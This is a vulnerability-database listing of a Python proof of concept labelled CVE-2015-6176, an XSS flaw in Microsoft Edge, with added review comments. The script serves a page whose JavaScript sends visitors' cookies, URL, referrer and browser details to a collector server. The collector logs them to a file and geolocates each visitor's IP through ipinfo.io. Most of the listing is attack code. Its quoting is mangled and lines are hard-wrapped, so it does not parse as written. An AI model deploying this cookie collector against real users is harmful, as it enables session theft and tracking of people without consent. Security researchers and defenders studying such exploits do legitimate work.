
Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)

22 Jul 2025 00:00:00 · Reported by nu11secur1ty · Type: exploitdb · Source: www.exploit-db.com · 256 views

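Microsoft Edge on Windows 10 Version 1511 is reported as vulnerable to cross-site scripting (XSS), documented as CVE-2015-6176. The listing below serves its own page and script from the tester's machine, so by itself it shows what script running in a page can read and send out, not how script would be injected into another site.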

# Title: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176

#!/usr/bin/python
# nu11secur1ty CVE-2015-6176

import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime

# TCP port of the HTTP server that serves the demo page (used by
# run_exploit_server with ExploitHandler).
PORT = 8080
# TCP port of the second HTTP server that records /collect requests (used by
# run_collector_server with CollectorHandler); also substituted into the page
# template in place of {COLLECTOR_PORT}.
COLLECTOR_PORT = 9000

# Page template returned by ExploitHandler.do_GET, which replaces the
# {LOCAL_IP} and {COLLECTOR_PORT} placeholders before sending it.
#
# NOTE(review): as extracted, every quote in this listing appears as \\\" or
# \\\' and long lines are hard-wrapped (including inside string literals and
# the comment just below), so the text does not parse as Python as-is. It is
# kept exactly as found.
#
# What the embedded script does, for readers assessing impact:
#   * On window load it reads document.cookie, the page URL, the referrer and
#     a few navigator/screen properties, URL-encodes them and requests
#     <collector>/collect?<query> by assigning the URL to a new Image's src.
#   * The page is served by this script's own server, so document.cookie here
#     only contains cookies of that origin. Nothing in this listing shows how
#     the script would come to run on a different site.
#   * Cookies set with the HttpOnly attribute are not visible to
#     document.cookie, and a Content-Security-Policy on the hosting page that
#     restricts img-src would stop the image request from leaving the browser.
#   * On the wire this is a plain GET whose query string carries cookie=,
#     url=, referrer=, language=, platform=, timezone= and screen= parameters,
#     which is what proxy or web-server logs would show.
#   * The body text mentions an alert, but the script never calls alert().
# HTML page with extended XSS exploit that sends lots of info via Image GET
to collector
HTML_CONTENT = b\\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
    try {
        var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\";
        var cookies = document.cookie || \\\"\\\";
        var url = window.location.href;
        var referrer = document.referrer;
        var language = navigator.language || \\\"\\\";
        var platform = navigator.platform || \\\"\\\";
        var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
\\\"\\\";
        var screenRes = screen.width + \\\"x\\\" + screen.height;

        var data = {
            cookie: cookies,
            url: url,
            referrer: referrer,
            language: language,
            platform: platform,
            timezone: timezone,
            screen: screenRes
        };

        var query = Object.keys(data).map(function(k) {
            return encodeURIComponent(k) + \\\"=\\\" +
encodeURIComponent(data[k]);
        }).join(\\\"&\\\");

        var img = new Image();
        img.src = attackerServer + \\\"?\\\" + query;
    } catch(e) {
        console.error(\\\"Error sending data:\\\", e);
    }
};
</script>
</head>
<body>
<h1 style=\\\"color:red;\\\">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
\\\"\\\"\\\"

# Response body that CollectorHandler.do_GET sends back after it has recorded
# a /collect request. It is a str (encoded to UTF-8 at send time), unlike
# HTML_CONTENT, which is bytes.
#
# NOTE(review): the stylesheet pulls its background image from a third-party
# host (images.unsplash.com), so any browser that renders this page makes an
# additional external request. The url(...) value and the comment just below
# are hard-wrapped in this listing; both are kept exactly as found.
# Collector page with large sea picture and centered message (Unicode
allowed)
COLLECTOR_PAGE = \\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>Collected</title>
<style>
  body {
    margin: 0;
    background: url(\\\'
https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80\\\')
no-repeat center center fixed;
    background-size: cover;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    color: white;
    font-family: Arial, sans-serif;
    font-size: 2em;
    text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
  }
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
\\\"\\\"\\\"

# HTTP handler for the page server: answers GET / and GET /index.html with
# HTML_CONTENT (placeholders filled in) and every other GET path with 404.
#
# NOTE(review): the base class is SimpleHTTPRequestHandler and only do_GET is
# overridden. HEAD requests are therefore still answered by the parent class,
# which resolves paths under the process's working directory and returns
# headers for files it finds there (no body). BaseHTTPRequestHandler would
# avoid that; confirm whether file serving was intended.
# NOTE(review): do_GET reads the module-level name local_ip, which this file
# assigns only inside the `if __name__ == "__main__"` block. Using the handler
# from an importing module would raise NameError on the first request.
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path in (\\\'/\\\', \\\'/index.html\\\'):
            # Fill the two placeholders with this host's address and the
            # collector port; HTML_CONTENT is bytes, so both values are
            # encoded before substitution.
            content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\",
local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\",
str(COLLECTOR_PORT).encode())
            self.send_response(200)
            self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
            # Length is taken from the substituted bytes, not the template.
            self.send_header(\\\"Content-Length\\\", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

# HTTP handler for the collector server: records the query parameters of
# GET /collect to stdout and to collected_data.log, then replies with
# COLLECTOR_PAGE. Any other path gets 404.
#
# NOTE(review): every value taken from the query string and the User-Agent
# header is chosen by whoever sends the request. parse_qs percent-decodes the
# values, so a value can contain newlines or terminal control characters, and
# these are printed and written to the log unmodified. Anyone reading the log
# or console should treat the content as untrusted.
# NOTE(review): collected_data.log is opened relative to the working directory
# and holds cookies, client IPs and user agents in clear text; it needs the
# same handling as any other file containing session material.
class CollectorHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = parse.urlparse(self.path)
        if parsed_path.path == \\\"/collect\\\":
            query = parse.parse_qs(parsed_path.query)

            # parse_qs maps each key to a list of values; only the first value
            # of each expected key is used, with "" when the key is absent.
            cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0]
            url = query.get(\\\"url\\\", [\\\"\\\"])[0]
            referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0]
            language = query.get(\\\"language\\\", [\\\"\\\"])[0]
            platform = query.get(\\\"platform\\\", [\\\"\\\"])[0]
            timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0]
            screen = query.get(\\\"screen\\\", [\\\"\\\"])[0]

            # Peer address of the TCP connection and the request's User-Agent.
            ip = self.client_address[0]
            user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\")
            # Naive local time of the collector host (no timezone attached).
            # The format string is hard-wrapped in this listing.
            timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d
%H:%M:%S\\\")

            # Outbound lookup to a third party; see get_location below.
            location = self.get_location(ip)

            # Only the cookie line is conditional; the remaining fields are
            # printed for every /collect request, even with an empty cookie.
            if cookie:
                print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\")
            print(f\\\"    URL: {url}\\\")
            print(f\\\"    Referrer: {referrer}\\\")
            print(f\\\"    Language: {language}\\\")
            print(f\\\"    Platform: {platform}\\\")
            print(f\\\"    Timezone: {timezone}\\\")
            print(f\\\"    Screen Resolution: {screen}\\\")
            print(f\\\"    From IP: {ip}\\\")
            print(f\\\"    User-Agent: {user_agent}\\\")
            print(f\\\"    Location: {location}\\\")
            print(\\\"-\\\" * 50)

            # Save collected info to a file
            # (append mode; unlike the console output, the cookie line is
            # written even when the cookie is empty)
            with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f:
                f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\")
                f.write(f\\\"    URL: {url}\\\\n\\\")
                f.write(f\\\"    Referrer: {referrer}\\\\n\\\")
                f.write(f\\\"    Language: {language}\\\\n\\\")
                f.write(f\\\"    Platform: {platform}\\\\n\\\")
                f.write(f\\\"    Timezone: {timezone}\\\\n\\\")
                f.write(f\\\"    Screen Resolution: {screen}\\\\n\\\")
                f.write(f\\\"    IP: {ip}\\\\n\\\")
                f.write(f\\\"    User-Agent: {user_agent}\\\\n\\\")
                f.write(f\\\"    Location: {location}\\\\n\\\")
                f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\")

            self.send_response(200)
            self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
            # Encode first so Content-Length counts bytes, not characters.
            content = COLLECTOR_PAGE.encode(\\\'utf-8\\\')
            self.send_header(\\\"Content-Length\\\", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

    # Return a "city, region, country (coords: ...)" string for ip, or a fixed
    # fallback message when the lookup does not return HTTP 200 or raises.
    #
    # NOTE(review): this sends the client's IP address to ipinfo.io on every
    # /collect request. It is also a blocking call (up to the 3 s timeout)
    # made from inside the request handler, and the servers in this file use
    # plain socketserver.TCPServer, which handles one request at a time.
    # NOTE(review): `except Exception: pass` hides every failure, including
    # malformed JSON; the caller cannot tell a private address from an outage.
    def get_location(self, ip):
        # Use free IP info service; fallback gracefully if no internet
        try:
            resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3)
            if resp.status_code == 200:
                data = resp.json()
                city = data.get(\\\"city\\\", \\\"\\\")
                region = data.get(\\\"region\\\", \\\"\\\")
                country = data.get(\\\"country\\\", \\\"\\\")
                loc = data.get(\\\"loc\\\", \\\"\\\")
                return f\\\"{city}, {region}, {country} (coords: {loc})\\\"
        except Exception:
            pass
        return \\\"Location lookup failed or unavailable\\\"

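def get_local_ip():
    """Return the IPv4 address of the interface used for outbound traffic.

    A UDP socket is "connected" to a public address purely so the operating
    system picks a route and a source address; connect() on a datagram socket
    sends no packet. The chosen source address is then read back with
    getsockname().

    Returns:
        The local IPv4 address as a dotted-quad string, or "127.0.0.1" when
        no route is available (for example on a host without networking).
    """
    # The context manager closes the socket on every path, replacing the
    # manual try/finally. String literals are written with plain quotes; the
    # extracted listing had them backslash-escaped, which does not parse.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        try:
            probe.connect(("8.8.8.8", 80))
            return probe.getsockname()[0]
        except OSError:
            # Socket-level failures only; programming errors are not masked.
            return "127.0.0.1"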

# Start the page server on PORT with ExploitHandler and block in
# serve_forever() until the process is interrupted.
#
# NOTE(review): the bind address is "" (all interfaces), so the page is
# reachable from every network the host is attached to, not only a lab
# segment. socketserver.TCPServer handles requests one at a time.
# NOTE(review): the banner reads the module-level name local_ip, which is
# assigned only in the `if __name__ == "__main__"` block. The f-string below
# is hard-wrapped in this listing.
def run_exploit_server():
    with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd:
        print(f\\\"[*] Exploit server running at: http://
{local_ip}:{PORT}/index.html\\\")
        httpd.serve_forever()

# Start the collector on COLLECTOR_PORT with CollectorHandler and block in
# serve_forever() until the process is interrupted.
#
# NOTE(review): like the page server this binds to "" (all interfaces), so any
# host that can reach the port can append entries to collected_data.log
# through /collect. The banner reads the module-level name local_ip, assigned
# only in the `if __name__ == "__main__"` block. The `with` line and the
# f-string below are hard-wrapped in this listing.
def run_collector_server():
    with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as
httpd:
        print(f\\\"[*] Collector server listening for stolen cookies at:
http://{local_ip}:{COLLECTOR_PORT}/collect\\\")
        httpd.serve_forever()

# Script entry point. local_ip is assigned at module scope here and is the
# global that ExploitHandler and both run_* functions read.
if __name__ == \\\"__main__\\\":
    local_ip = get_local_ip()
    try:
        print(f\\\"[*] Your server IP is: {local_ip}\\\")
        # The page server runs in a daemon thread, so it ends with the process
        # without an explicit shutdown; the Thread(...) call is hard-wrapped
        # in this listing.
        exploit_thread = threading.Thread(target=run_exploit_server,
daemon=True)
        exploit_thread.start()

        # The collector runs in the main thread and blocks until Ctrl-C.
        run_collector_server()
    except KeyboardInterrupt:
        print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\")

```

# Video:
[href](https://www.youtube.com/watch?v=T2YLrFsvXOc)

# Source:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)

# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)


22 Jul 2025 00:00 (current)
Vulners AI Score: 7.4 (High risk)
CVSS 2: 4.3
EPSS: 0.10826